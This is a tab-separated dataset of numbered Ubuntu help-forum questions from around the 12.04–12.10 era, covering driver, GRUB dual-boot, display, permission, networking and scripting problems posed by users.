265793	ati driver on 12.10	to begin with - i 've searched other questions with no luck . so : i 've got a 12.10 and trying to set ati drivers using this tutorial . after installing and rebooting i 've got a blank desktop and used this : sudo apt-get remove -- purge fglrx fglrx* to get back , but nothing happened ! i 'm stuck with this empty desktop . what can i do to get back to open source drivers ? lspci -vvnn | grep vga tells me that i have mobility radeon hd 4500/5100 series card .
265795	grub menu does n't show windows 7 option	i 'm in need of help to repair my dual os ( windows & ubuntu ) , i installed ubuntu after installing windows 7 but grub menu does n't show windows 7 option to select . i 'm here to ask how can i make my computer a dual os boot such that windows 7 is already installed . disk /dev/sda : 40.0 gb , 40020664320 bytes 255 heads , 63 sectors/track , 4865 cylinders , total 78165360 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000abaf4 device boot start end blocks id system /dev/sda1 * 2048 74010623 37004288 83 linux /dev/sda2 74012670 78163967 2075649 5 extended /dev/sda5 74012672 78163967 2075648 82 linux swap / solaris disk /dev/sdb : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xf449f449 device boot start end blocks id system /dev/sdb1 * 63 251658224 125829081 7 hpfs/ntfs/exfat /dev/sdb2 251658225 503316449 125829112+ f w95 ext 'd ( lba ) /dev/sdb3 503316450 754974674 125829112+ 7 hpfs/ntfs/exfat /dev/sdb4 754974675 976768064 110896695 7 hpfs/ntfs/exfat /dev/sdb5 251658288 503316449 125829081 7 hpfs/ntfs/exfat
265800	shutdown when laptop lid closed	i want my laptop to shutdown when i close the laptop lid . but in the power settings i can only choose between : suspend do nothing hibernate ( disabled ) is there any way to configure it with more options ?
265802	can not upgrade from 10.04 due to `` karmic '' error during upgrade	i 'm trying to upgrade from 10.04 to 10.10 and up . i am currently connected to the internet . the last thing that i want to have to do is a fresh install since i dual boot the machine and i do n't want to risk anything . any suggestions or help would be greatly appreciated . i have been getting the following error : could not download all repository indexes the repository may no longer be available or could not be contacted because of network problems . if available an older version of the failed index will be used . otherwise the repository will be ignored . check your network connection and ensure the repository address in the preferences is correct . failed to fetch < http : //us.archive.ubuntu.com/ubuntu/dists/karmic-backports/restricted/binary-i386/packages.gz [ and sources.gz ] > 404 not found [ ip : 91.189.91.15 80 ] failed to fetch < see above > 404 not found [ ip : 91.189.91.15 80 ] failed to fetch < see above > 404 not found [ ip : 91.189.91.15 80 ] failed to fetch < see above > 404 not found [ ip : 91.189.91.15 80 ] failed to fetch < see above > 404 not found [ ip : 91.189.91.15 80 ] failed to fetch < see above > 404 not found [ ip : 91.189.91.15 80 ] failed to fetch < see above > 404 not found [ ip : 91.189.91.15 80 ] failed to fetch < see above > 404 not found [ ip : 91.189.91.15 80 ] some index files failed to download , they have been ignored , or old ones used instead .
265804	a command to call a terminal ( not a hotkey )	in krusader there is a command `` konsole '' to call a konsole application . but what if i want to call the standard terminal , how can i do this ?
265811	what does mean dns-seach option in /etc/network/interfaces	can anybody describe me about dns-search directive in /etc/network/interfaces file : iface eth0 inet static address 192.168.3.3 netmask 255.255.255.0 gateway 192.168.3.1 dns-search example.com dns-nameservers 192.168.3.45 192.168.8.10 is it mandatory ? and how i configure it ?
265812	can i install ubuntu on eeepc 900	can i install ubuntu 12.10 on my eepc900 ? the second sdd is broken , so there are only still a 4gb harddisk , 1gb ram
265821	how to fix `` the system is running in low graphics mode '' error on toshiba satellite -t110 ?	for a while , i have run ubuntu 12.0 along side windows on my net book however , recently when i start ubuntu i am faced with this error message `` the system is running in low graphics mode . '' a quick search came up with many possible solutions , however my added problem , is there is no space on my device . can i delete any other files in order to fix the problem . cheers for any help i tried this link how to fix `` the system is running in low-graphics mode '' error ? none of these solutions worked as my laptop is full
265827	microsoft license compliance check	we are using ubuntu for 1.5 years . we have around 50 pcs running on ubuntu . before that i was using windows . last week i got a call from microsoft legal team that they want to do a compliance check . i told them that we are using ubuntu but they said they still want to check the pcs . please let me know what should i do . will i get into trouble because i used windows 1.5 year back ?
265828	unable to install ubuntu 12.04 alongside windows 7	i previously installed ubuntu 12.10 using wubi but it heated up my laptop too much and my battery ran out in minutes , so i removed it . now i am trying to do a normal dual-boot install using 12.04 , but it wont go further than the boot screen . i am booting from a usb and when i reach the boot menu it gives a beeping sound . when i click `` install ubuntu '' or any other option there is another beeping sound , but the process does n't go any further . my specs : dell vostro 3450 , intel core i5 2410m , 4 gb ram with amd graphics and win7 64 bit professional pre-installed .
265830	how do i logout from yahoo chat in ubuntu ?	in the top main bar next to battery , wireless , clock is an envelope icon where ( i do not remember how happened ) i am logged in to yahoo chat . say i want to login with another account or simply logout and erase user and pass people who might use my computer can not chat from my account by simply logging in back just by pressing a button . so , how do i logout for good ?
265836	ubuntu server 12.04.2 lts problem	today i installed ubuntu server 12.04.2 lts i386 version on my old amd athlon 2000+ pc ... the thing is i do n't have access to internet . i cant even execute sudo apt-get update ... an i cant ping www.google.com during installation i put the local ip 192.168.1.175 , subnet 255.255.255.0 , nameserver from my isp 194.146.109.223 and i left proxy empty and i jut pressed enter after the proxy . now i do n't have any acces to internet from server and i ca n't update my machine ... is it because i did n't put any proxy address ? ? ?
265845	how to install driver for airlive wn-370usb manually ?	first of all , hi i 'm new here and i would like to know how to install driver for airlive wn-370usb manually . i downloaded zipped driver from another computer and `` transfer it '' through usb stick . but i do n't know how to install it manually . i type tar -zxvf and drag the file , and then it show more files . but what should i do next ? ? ? could somebody write tutorial or video on how to do that ? or just paste me a link where somebody did this . thanks sorry for making new thread if it already exist ( but i did n't find it )
265846	continue script in terminal after pkill fullscreen program	i 'm running a fullscreen program and i 'm using pkill to close it by a keyboard shortcut . killing the program works but my kill script also contains some other code . the rest of the script is n't being executed . seems like it does n't know to continue in the terminal or something . any ideas ?
265847	mir the x server replacement	i read much about the x server replacement mir , but i am not quite sure which benefits it will have . ok it is a newer technologie , the currently used x server uses code that is twenty years old or even older . so i have some questions targeting this topic : will mir also replace x server and wayland in other distributions ? when could we expect the first ubuntu using mir ? will it be easier to port ubuntu to a new device when mir is used ? could we expect some performance enhancements ?
265848	quickly gives warnings on packageing , not recognizing setup.py~	i have been trying to make an application and package it and so on , but i have run in to a lot of errors , so i tried to get back to basic : after the command quickly create ubuntu-application dj1 and cd dj1 i get my app , which can run and package with quickly package , works fine ! although i get some warnings that ** ( setup.py:5609 ) : warning ** : error sending credentials : error sending message : operation not permitted but i 've read that one should state your name and such in the setup.py file at the bottom . so i did quickly edit and had to open the setup.py file separately and wrote my license , name , email , description and long description at the appropriate places ( i did not include a web page ) . i saved and terminated gedit . now when i run quickly package i get ... ... . command returned some warnings : -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- warning : the following files are not recognized by distutilsextra.auto : setup.py~ -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- do you want to continue ( this is not safe ! ) ? y/ [ n ] : n i 've read on this forum that one can downgrade python-distutils-extra to the last stable verison with : sudo apt-get install python-distutils-extra=2.32-2 but after i did that and tried to package again i got the same warnings . ( and i also read that one should not simply remove the setup.py~ file ) does anybody know how to get rid of these warnings ? am i using the edditor in a wrong way ? i tried before and used emacs , but same thing there ... i 'm running ubuntu 12.04 lts . thanks
265849	'make install ' problem	i am new to ubuntu . so i tired to install a software by typing the 'make install ' . this error is occurred . please help me . cd src & & make cc='gcc ' cppflags= '' defs='-dhave_config_h -dsystem_wgetrc=\ '' /usr/bin//etc/wgetrc\ '' -dlocaledir=\ '' /usr/bin//share/locale\ '' ' cflags='-o2 -wall -wno-implicit ' ldflags= '' libs= '' prefix='/usr/bin/ ' exec_prefix='/usr/bin/ ' bindir='/usr/bin//bin ' infodir='/usr/bin//info ' mandir='/usr/bin//man ' manext='1 ' install.bin make [ 1 ] : entering directory `/home/praneethpj/wget1.5.3/src' gcc -o2 -wall -wno-implicit -o wget cmpt.o connect.o fnmatch.o ftp.o ftp-basic.o ftp-ls.o ftp-opie.o getopt.o headers.o host.o html.o http.o init.o log.o main.o md5.o netrc.o rbuf.o recur.o retr.o url.o utils.o version.o /usr/bin/ld : h_errno : tls definition in //lib/libc.so.6 section .tbss mismatches non-tls reference in ftp.o //lib/libc.so.6 : could not read symbols : bad value collect2 : ld returned 1 exit status make [ 1 ] : *** [ wget ] error 1 make [ 1 ] : leaving directory `/home/praneethpj/wget1.5.3/src' make : *** [ install.bin ] error 2
265855	only wallpaper is shown after log in	i have installed ubuntu on virtual box . once i run it and log in , wallpaper appears with nothing on it , menu bar , icons etc . nothing . only cursor is available but right click is unresponsive .
265865	format partition to what block size for photos only	i have a lot of photos and am working on them extensively , mainly going quickly through them back and forth via a photo browser and also doing some work via scripts . would that make sense to format a separate partition with larger than 4096 block size ( e.g . 64k ) ? would my io operations on the files improve ? how ? is it healthy and safe for the hdd with otherwise 512 block size partitions ? cheers .
265867	how can i trace the files and functions a particular terminal uses ?	in openstack , lets say for example , i 'm entering the command and i start up an instance using the image myimage and use flavor 1. nova boot -- image myimage -- flavor 1 server1 how can i actually trace this command and get details like what functions are executed , which files it enters while executing the command etc. , sorry i 'm a linux noob and i 'm trying to find ways to trace few calls . instead of doing this by going through all the files and doing this . is there a simple way to do this ?
265872	can someone recommend a java ebook maker for mobile on ubuntu 12.04 ?	can someone recommend a java ebook maker for mobiles ? i want to create 176x220 or 240x320 ebooks for my personal use . i am using ubuntu 12.04 . i found a couple of softwares for windows but i do n't want to use wine and windows dlls in my pc . thanks
265874	grub error while trying to run fully installed ubuntu 12.04 from ssd	due to my laptop having a ram problem , i removed its ssd ( which contains an ubuntu 12.04 installation , with my personal data ) and attempted to boot it from my old p4 machine lying around . this p4 machine has windows xp installed on its drive . so what i did was : i disconnected the hard drive of the p4 machine . i connected the ssd to the usb port via an adapter , and configured the ( c2001 ) bios to boot from the ssd . i am then presented with a grub rescue prompt . this is the first time seeing the grub prompt and i have no idea what commands to use to even poke around . my first guess is that the problem is with the bootloader as i 'm assuming the bios would have to load the bootloader in order to display the grub prompt in the first place . however beyond that i 'm not sure what to make of this . anyone encountered this problem before ?
265875	google chrome on 12.10 right-click causes browser tab to freeze , how do i debug ?	this is a weird issue i 've been having with google chrome on 12.10 , any time i right click on a page , the tab becomes unusable , it freezes and can not be interacted with . this is certainly an ubuntu problem ( i 'm thinking graphic driver related ) since i have the exact same setup with different hardware and ca n't re-produce . output of lspci 00:00.0 host bridge : intel corporation 3rd gen core processor dram controller ( rev 09 ) 00:01.0 pci bridge : intel corporation xeon e3-1200 v2/3rd gen core processor pci express root port ( rev 09 ) 00:14.0 usb controller : intel corporation 7 series/c210 series chipset family usb xhci host controller ( rev 04 ) 00:16.0 communication controller : intel corporation 7 series/c210 series chipset family mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 2 ( rev 04 ) 00:1b.0 audio device : intel corporation 7 series/c210 series chipset family high definition audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 1 ( rev c4 ) 00:1c.1 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 2 ( rev c4 ) 00:1c.2 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 3 ( rev c4 ) 00:1d.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation hm76 express chipset lpc controller ( rev 04 ) 00:1f.2 sata controller : intel corporation 7 series chipset family 6-port sata controller [ ahci mode ] ( rev 04 ) 00:1f.3 smbus : intel corporation 7 series/c210 series chipset family smbus controller ( rev 04 ) 01:00.0 vga compatible controller : nvidia corporation gf108 [ geforce gt 630m ] ( rev a1 ) 01:00.1 audio device : nvidia corporation gf108 high definition audio controller ( rev a1 ) 02:00.0 multimedia controller : advanced micro devices [ amd ] nee ati theater hd t507 ( dvb-t ) tv tuner/capture device 03:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller ( rev 07 ) 04:00.0 unassigned class [ ff00 ] : realtek semiconductor co. , ltd. rts5229 pci express card reader ( rev 01 ) i do n't even know how to begin to debug this ... any help is appreciated .
265880	why does powertop still detect tunable settings on > 12.04 ?	according to this q & a laptop-mode-tools and powertop are not needed anymore with ubuntu 12.04 as the power savings are now included in the kernel . so i decided to remove laptop-mode-tools from my laptop , as it caused my laptop to hang on shutdown when on battery and supposedly would not make any difference in power consumption . but when i checked powertop after removing laptop-mode-tools i remarked that actually some `` tunables '' went from `` good '' with laptop mode still on , to `` bad '' after removal . bad vm writeback timeout bad runtime pm for pci device fresco logic fl1000g usb 3.0 host controller bad runtime pm for pci device intel corporation 6 series/c200 series chipset family 6 port sata ahci controller bad runtime pm for pci device intel corporation 6 series/c200 series chipset family usb enhanced host controller # 1 bad runtime pm for pci device intel corporation 6 series/c200 series chipset family pci express root port 6 bad runtime pm for pci device intel corporation 6 series/c200 series chipset family pci express root port 4 bad runtime pm for pci device intel corporation 6 series/c200 series chipset family pci express root port 1 bad runtime pm for pci device intel corporation 6 series/c200 series chipset family pci express root port 2 bad runtime pm for pci device intel corporation 6 series/c200 series chipset family usb enhanced host controller # 2 bad runtime pm for pci device intel corporation xeon e3-1200/2nd generation core processor family pci express root port bad runtime pm for pci device intel corporation 2nd generation core processor family integrated graphics controller bad runtime pm for pci device intel corporation 6 series/c200 series chipset family mei controller # 1 good wireless power saving for interface wlan0 good enable sata link power management for /dev/sda good nmi watchdog should be turned off good enable audio codec power management good bluetooth device interface status good autosuspend for usb device bt-270 ( broadcom corp ) good autosuspend for usb device usb2.0 uvc 2m webcam ( usb2.0 uvc 2m webcam ) with laptop-mode-tools still on only the first one was marked as `` bad '' . so my actual questions are : if those power savings are are integrated in the kernel used by ubuntu 12.04 , why can powertop see a difference ? will removing laptop-mode-tools change anything to my battery life ? i also installed jupiter to improve my batterylife , is this irrelevant as well ? i hope my explanations were somewhat clear . ( note that i am quite new to ubuntu and to gnu/linux ) thanks a lot .
265889	what 's the difference between usb , uuid , disk identifier and vendor id ?	i need a persistent , unique identifier of a usb drive that never changes , to make a mount point folder . can you explain the difference between disk identifier , vendor id and uuid ? can you also advise how i should set this mount point . # fdisk -l | cut -f3 -d'/ ' | cut -f1 -d ' , ' | grep 'disk identifier : ' gets the disk identifier . and # lsusb show me the vendor id and # blkid and # ls /dev/disk/by-uuid show me the uuid i 've read about uuid , but could n't find and comparison between those three please help
265890	tabs in fullscreen chrome/chromium	i love chrome and chromium , but when i go full screen , i ca n't get to my other tabs anymore , which i can with firefox . so my questions are : am i alone or is this universal ? is there a fix ? is there some useful keyboard shortcut to switch tabs ? thanks in advance !
265893	how to find link for source.list ?	i want to install gnome evolution from git repo . i am getting errors when i run the below command : /configure prefix=/opt so i want to use apt-get build-dep command . but i am getting this error e : you must put some 'source ' uris in your sources.list i should add /etc/apt/sources.list uri i know , but could n't find uri for sources.list file . how can find it ?
265900	no sound on 12.04 ( wubi )	i 've been struggling with this for quite a while . i have no sound at all ( system sounds , login sound , rhythmbox , vlc , youtube etc . ) the system detects my audio card ( pod studio ux2 ) i 've tried 'sudo alsa force-reload ' , nothing . no sound through headphones either . i 've checked everywhere , nothing is muted . system settings > sound > test sound also produces no sound note : pod studio ux2 is an external audio card by line6 . can someone please help ?
265902	how do i change permissions on a fat32 drive ?	my usb type is fat32 . i tried to solve problem using terminal ( http : //askubuntu.com/a/96929/130182 ) , but it gives me an error : mount : special device /dev/sdb1 does not exist how i can change permissions on fat32 flash-drive ?
265912	problems with grub customizer 3.0.4	i have had problems with grub customizer with 12.10 . one of the problems is that the up and down arrow keys do n't function when i add a background image . i recently had to reinstall ubuntu because i lost the boot capability completely with words to the effect of unable to find operating system , grub restore error and i had no luck with the grub repair tool .
265913	how to merge two partitions separated by another partition ?	i cant merge these two partitons together like in this picture : the ntfs partition is my data , i do n't want to delete it . how to merge these two so that i can install ubuntu ?
265915	libreoffice writer - weird math symbols from .docx files	i have libreoffice 4.0 and kubuntu 12.04 . i have worked on a .docx file from microsoft office 2010 and i have used math symbols . now in ubuntu i ca n't see those symbols well with libreoffice writer . here is a picture : how can i solve it ? if i enlarge the symbols from the picture above , i can see the function i wrote but in my file there many many symbols like those so i ca n't edit each of them .
265918	apache error 98	whenever i boot up apache , this error occurs : ( 98 ) address already in use : make_sock : could not bind to address 0.0.0.0:80 no listening sockets available , shutting down i 've dug around the forums , and found the methods used to view all processes using port 80 , such as : lsof -i | grep http and lsof -i | grep :80 and then kill them . for some bizarre reason , nothing comes up when i run these checks , and even without the `` grep '' , i still can not find anything . i 've tried reinstalling apache , including purging all the files .
265921	timeframe on push to autodeploy.zip ?	given the answer to this question ( stuck pushing to /sdcard/autodeploy.zip ) how long should one expect the push to take given standard usb ? i 'm attempting the flash via a pretty hefty ubuntu virtual machine on windows 7 , and it 's taking a long while . over a half-hour at this point .
265925	inserting variable into sed command in bash script	i have text file similar to this : some-text keyword some-text some-text keyword some-text keyword keyword i want to replace every `` keyword '' with `` number.extension '' where number is 1 at first keyword match , 2 at second keyword match etc . i know that i should use bash loop combined with sed ( sed 's : keyword : number : g ' ) , but i am not sure how to insert variable for number in that sed command . as this is html file , there can be blank lines or any text beetween those `` keywords '' .
265929	ftp server with active directory integration	can anyone tell me a ftp server with active directory integration ?
265930	really slow boot time ubuntu 12.10 gnome 3.6	my problem slow boot time on ubuntu 12.10 . i configured autostart and make booting a bit faster , but still 55s is too long for me to wait . i used bootchart and got this : do you guys have any ideas what may slow down my os ?
265932	is it safe to defrag ext4 file system using e4defrag ?	my file system partition is 90gb & now 75 % of the space is free after removing 53gb of recovered files using photorec from my home directory.i just want to know is it safe to defrag the whole file system using e4defrag or are there any extra precautions that i should be aware of ?
265936	ubuntu 12.10 does n't recognize partitions	i just did a clean install of windows 7 on a brand new laptop ( packard bell easynote le ) . i created 3 partitions : 150 gb on which i installed windows 7 50 gb for ubuntu 270 gb for file storage when i installed windows 7 , i rebooted and fired up the ubuntu 12.10 live cd and i was represented with only 2 choices : install ubuntu and erase everything something else so i selected something else and it lists the 500gb as free space .
265937	custom keyboard layout not active after reboot	i have customized my keyboard layout by changing a line in /usr/share/x11/xkb/symbols/da ( so my onehalf key is now a dollar - easier when coding in php ) . my problem is that this change is not remembered by ubuntu when i reboot - the file is not changed , but the key is now onehalf again . if i go into `` keyboard layout '' in the system settings and then add a random language and remove it again , my own layout is back again . is there some sort of cache that i need to update ?
265939	unable to change the refresh rate to 60hz with xrandr	my monitor supports 1920ă1080 @ 60hz ( lg w2486l ) and graphic card ( geforce 9400 gt ) using ubuntu 12.04 . when i type xrandr -q i get this : xrandr -q xrandr : failed to get size of gamma for output default screen 0 : minimum 1920 x 1080 , current 1920 x 1080 , maximum 1920 x 1080 default connected 1920x1080+0+0 0mm x 0mm 1920x1080 50.0* 1920x1080_59.90 59.9 1920x1080_60.00 60.0 right now the refresh rate is on 50 and hurt my eyes real bad . so i 'm trying to change it to 60hz : xrandr -- output default -- mode 1920x1080_60.00 xrandr : failed to get size of gamma for output default what i can do ? i tried gtf 1920 1080 60.0 # 1920x1080 @ 60.00 hz ( gtf ) hsync : 67.08 khz ; pclk : 172.80 mhz modeline `` 1920x1080_60.00 '' 172.80 1920 2040 2248 2576 1080 1081 1084 1118 -hsync +vsync xrandr -- newmode `` 1920x1080_60.00 '' 172.51 1920 2040 2248 2576 1080 1081 1084 1118 -hsync +vsync xrandr : failed to get size of gamma for output default x error of failed request : badname ( named color or font does not exist ) major opcode of failed request : 153 ( randr ) minor opcode of failed request : 16 ( rrcreatemode ) serial number of failed request : 19 current serial number in output stream : 19 xrandr -- output default -- mode 1920x1080_60.00 xrandr : failed to get size of gamma for output default someone have the solution for this ? i ca n't work on the pc like that , 50hz is very low and ca n't look at the screen more than 5 mins . thank you !
265940	errors in a simple c++ program	# include < iostream > int main ( ) { char ch = 'a ' ; int num = ch ; cout < < `` the ascii code for `` < < ch < < `` is `` < < num < < `` \n '' ; cout < < `` adding 1 to the character code : \n '' ; ch = ch + 1 ; num = ch ; cout < < `` the ascii code for `` < < ch < < `` is `` < < num < < `` \n '' ; return ( 0 ) ; } i get the errors like ex1.cpp : in function ‘int main ( ) ’ : ex1.cpp:6:5 : error : ‘cout’ was not declared in this scope ex1.cpp:6:5 : note : suggested alternative : /usr/include/c++/4.6/iostream:62:18 : note : ‘std : :cout’ guys please correct my mistakes .
265945	windows 7 not able to boot after installing ubuntu 12.10	i installed ubuntu 12.10 using a bootable usb ( 4gb ) on my friend 's laptop . dell inspiron 1510 ( n series ) initially , she approached me since ubuntu was not able to be installed on her laptop . the problem was that her hdd was converted into a dynamic disk . i used easeus to convert the disk into basic disk . first time it gave me a small error and it did n't apply the changes on the computer yet ( had n't rebooted yet ) but i closed easeus after the process finished and checked disk management , hdd was still dynamic . i repeated the process . this time , the entire process went smoothly and i installed ubuntu 12.10 successfully as a dual boot . after that , i could n't boot into windows 7 i can access the files from ubuntu though . she does n't have a recovery disk and does n't remember the version of windows 7 ( most probably home basic/premium ) how can i find out the correct version ? how can i fix this problem ?
265954	how do i disable global menu for libreoffice 4.0 in ubuntu 12.04 ?	i 'd like to disable global menu for libreoffice 4.0 in ubuntu 12.04 64-bit . the global menu for the others applications had already been disabled after removing appmenu-gtk3 , appmenu-gtk or appmenu-qt .
265956	swap f keys to perform functions without fn key	my laptop has a function key which turns f keys into keys which change volume or brightness . i would like to swap a number of them so that they perform that function under normal operation and are an fx key while the function key is being held . i assumed that the function keys were just normal keys codes with the set of keys being large enough to include all the possible speical keys . i tried to so as this tutorial suggests ( how do i remap certain keys ? ) and use xev to obtain the key codes and then would use xmodmap to swap their value . this does not seem to work though . the f12 key gives the xev output : keypress event , serial 41 , synthetic no , window 0x4a00001 , root 0xb1 , subw 0x0 , time 468005 , ( 23 , -15 ) , root : ( 89,37 ) , state 0x10 , keycode 96 ( keysym 0xffc9 , f12 ) , same_screen yes , xlookupstring gives 0 bytes : xmblookupstring gives 0 bytes : xfilterevent returns : false which i think is to be expected . however , the increase volume button give this response : keymapnotify event , serial 41 , synthetic no , window 0x0 , keys : 65 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 and so does the decrease volume key . how can i perform the swapping of the keys that i would like ? thank you
265962	ubuntu + windows 8 pro dual boot - grub ca n't find command 'drive map '	i have the following setup : samsung 840 series ssd drive with three partitions : efi boot partition ( 200 mb ) linux swap space ( 2 gb ) primary ubuntu drive ( 490 gb ) crucial m4 ssd with one partition : windows 8 pro drive ( 250gb ) the ssd drives are new , and the windows 8 was installed before ubuntu . i set the boot on my bios ( asrock extreme4 ) to go to the ubuntu grub loader , which lists a couple options for booting ubuntu as well as an option for booting windows 8 . ubuntu loads without any problem . whenever i try to load the windows 8 os , i get the following error : grub ca n't find command 'drive map' i have tried accessing the m4 drive from ubuntu to see if i can find the boot location on the ntfs windows drive , but i ca n't mount the windows drive to ubuntu , because it gives this error : failed to mount '/dev/sdb1 ' : operation not permitted the ntfs partition is hibernated . is there an easier way to fix the grub boot commands that involves not mounting the windows 8 drive to ubuntu ? edit : i tried using the ubuntu boot repiar tool from a linuxlive usb loader . the `` recommended '' fix did n't fix anything , but it gave me this paste file , detailing my boot setup , if it helps : http : //paste.ubuntu.com/5600941/ i think the major problem lay in that the windows partition is on another disk , which ca n't be mounted in ubuntu , hence i ca n't use grub probe without getting errors . edit 2 : [ solution ] i ended up just reformatting the ubuntu drive again , and installing ubuntu via liveusb with the linuxsecureremix ubuntu iso found here . this was installed across two partitions on the drive - one for swap and one for ubuntu . then i loaded ubuntu on the new partition , and used gparted to create an efi partition alongside the ubuntu and swap partitions , making sure the efi partition was created first and then flagged boot_efi second . then i ran boot-repair , and used recommended settings . boot-repair was finally able to detect the now-blank boot_efi partition , and install grub . for whatever reason before , it was not able to use efi partition created with the ubuntu install . now ubuntu grub works with windows 8 . if you are having trouble with windows 8 and ubuntu grub , boot-repair , or burg i would recommend reading here first before you try the reformat that i did .
265965	installing windows 7 after installing ubuntu 12.10 ?	i 'm currently using ubuntu 12.10 , but i also want to install windows 7 and be able to dual-boot . how would i go about doing this ?
265966	mouse freezes randomly	i have tried tons of different `` solutions '' to no avail . first off i 'm running 64-bit 12.04 lts , and i 'm using a usb mouse that freezes after 20 minutes or so ? everything else will work except for the mouse . mouse freezes after 20 minutes of use greg @ ubuntu : ~ $ synclient touchpadoff=0 could n't find synaptics properties . no synaptics driver loaded ? ubuntu 12.04/12.10 keeps on freezing it just did n't work after i installed the kernels . upgrade your graphics card drivers again this did not work . thanks in advance , tell me if you need anymore info at all . system info update : i just tried to log off while it was frozen and that did not fix the problems as it did for others . i 'm going to do my updates and see how that will work . i will post an update if it works .
265970	ubuntu wo n't recover after hibernate mode	with ubuntu 12.10 and a nvidia card , sometimes my monitor wo n't turn back on when the machine returns from hibernate mode . actually it may not be the monitor but the system wo n't recover so i have to reboot . i tested the memory and that is working . the hard-drive seems to be fine . i usually run all the updates , hopefully an update will fix the problem . has anyone experienced this ? it is intermittent , maybe two times a week after running it continuously .
265972	is there anything like nanny that 's still being developed ?	just installed ubuntu 12.04 lts for my kids to use . i am concerned about how long they use the pc each day . is anyone aware of any parental time-limit apps , like gnome nanny or timekpr , that are still active and will work with precise ? i 've found selfcontrol but i 'm looking for more than just internet access restriction . for now , i am acting as the 'time keeper ' until i find a software solution but thanks for any ideas . thank you .
265981	problem when changing permissions of a folder in a ntfs filesystem	while trying to make a daap server work , with tangerine , i realized that my music library does n't has read permissions for all users , but has all the permissions for the owner and the group ( tangerine needs read permissions for all users ) . thing is , my music is stored in a separate disk , with ntfs disk format , and no matter how much i use sudo chmod -r 774 */folder* the permissions do not change . this disk is automatically mounted to a specific location ( /windows/backup ) thanks to fstab ; the owner of the files in the disk is root and the group is plugdev . the fstab is : uuid=328ecc0c-b204-4450-a42c-ba64bc29e621 / ext4 errors=remount-ro 0 1 uuid=9189347c-056a-4860-ad6f-155d3a21fd90 /home ext4 defaults 0 2 uuid=f674a4c474a48947 /windows/backup ntfs defaults , umask=007 , gid=46 0 0 uuid=867ea7097ea6f0db /windows/main ntfs defaults , umask=007 , gid=46 0 0 uuid=b5e4c040-5117-45c3-8b76-7fa29977eb80 none swap sw 0 0 thanks for your help .
265982	unable to start sshd	i 'm new to ubuntu and trying to start sshd but having a lot of problems . i 've tried uninstalling and reinstalling ssh by running sudo apt-get remove openssh-client openssh-server and sudo apt-get install openssh-client openssh-server . when i run sudo service ssh restart i get : stop : unknown instance : ssh start/running , process 3638 sudo service sshd start gives me unrecognized service . when i run ps -a | grep ssh i get nothing . running ssh localhost gives me a connection refused . thanks for any help .
265983	how do i terminate the xserver	i just installed ubuntu server 12.04 x86 on a virtual device ( i 'm using virtualbox ) and i executed the following commands : sudo apt-get install xserver-xorg and sudo apt-get install ubuntu-desktop and it works fine , but i am a beginner and do not know how to terminate xserver . ( terminate it , not just pressing ctrl + alt + f1 to use the command line ) can you help me with that ? i was doing some googleing and found a command : sudo /etc/init.d/gdm stop but it says it ca n't find the command . any other ways ?
265989	photorec alternative for scanning ram dumps ?	i want to scan some ram dumps for files . i was hoping i could use photorec , but it prompts me to select a hard drive , and not scan from a file . is there a way to do this ? thanks !
265990	getting a ubuntu 12.10 driver for nvidia gt 640	i know there 's a ton more posts like this but now of them helped me , everytime i install a proprietary nvidia driver my desktop does n't show up but when i 'm using noveau it 's quite evident it 's not the right driver because the screen flickers and a lot of effects are weird i managed to have 5 drivers apear in the additional drivers section by running sudo apt get linux-headers-generic and i tried all of them , they were the 304 and 304 experimental and the 310 and 310 experimental , ( and the noveau one ) but all of them did pretty much the same thing please help i have a nvidia geforce gt 640
265991	retrieve files deleted by command rm in terminal	here 's a summary : i was programming using java and accidentally , instead of using the rm *.class command in the command-line , i used rm *.java . it took me a lot of time to finish that code . i hope someone knows a way to retrieve those files . please help me .
265996	why does my 'caps lock ' diode blink when my system freezes ?	i noticed a peculiar behavior of my ubuntu 13.04 ( although possibly it 's also present in previous versions ) : when my system freezes completely ( i do not ask for troubleshooting this ) so that even x does not respond to ctrl+alt+fx keys , the capslock toggle diode on my keyboard blinks ( with frequency of ~1hz ) , although the system is completely unresponsive . what is the cause of this phenomena ? is it caused by some internal kernel mechanisms ? is this specific to ubuntu ( is it caused some custom ubuntu additional software ) ? does it has anything to do with hal ? what is the purpose of it ? can i customize this behavior on ubuntu ?
265999	how to remove kernel/lts enablement stack ?	this question regarding the lts enablement stack has actually two parts : i installed linux 3.5.0-x on precise 64bit via sudo apt-get install linux-generic-lts-quantal xserver-xorg-lts-quantal . as it turns out , virtualbox does not work yet on the new kernel ( edit : this is fixed now. ) . therefore i want to remove it from the system . as expected removing the meta-packages via sudo apt-get install linux-generic-lts-quantal xserver-xorg-lts-quantal is not enough . what packages do i need to remove manually ? for the kernel i would do ( as of now ) : sudo apt-get remove linux-image-3.5.0-25-generic . however , regarding xserver-org i am lost . how can i switch back to the original xserver ? i installed a system with the 12.04.2 installation media . there i have also the 3.5.0-x kernel , because that 's the default for this point release . how can i downgrade to the kernel ( and xserver ? ) to the 3.2.0-x series ? thank you !
266000	ip cam viewer for vonnics dvr ubuntu	i am trying to view the output from my vonnics dvr security system . it works from a windows program that came with the system , i-phones and my android based phone . the only windows computer is my sons gaming box so it would be a lot nicer to be able to check the cams from a linux box . http : //ipaddress : port # /videostream.cgi ? user=username & pwd=password does n't work . is there a linux ip cam viewer ? is my only option to use wine or an android emulator ? any help would be great .
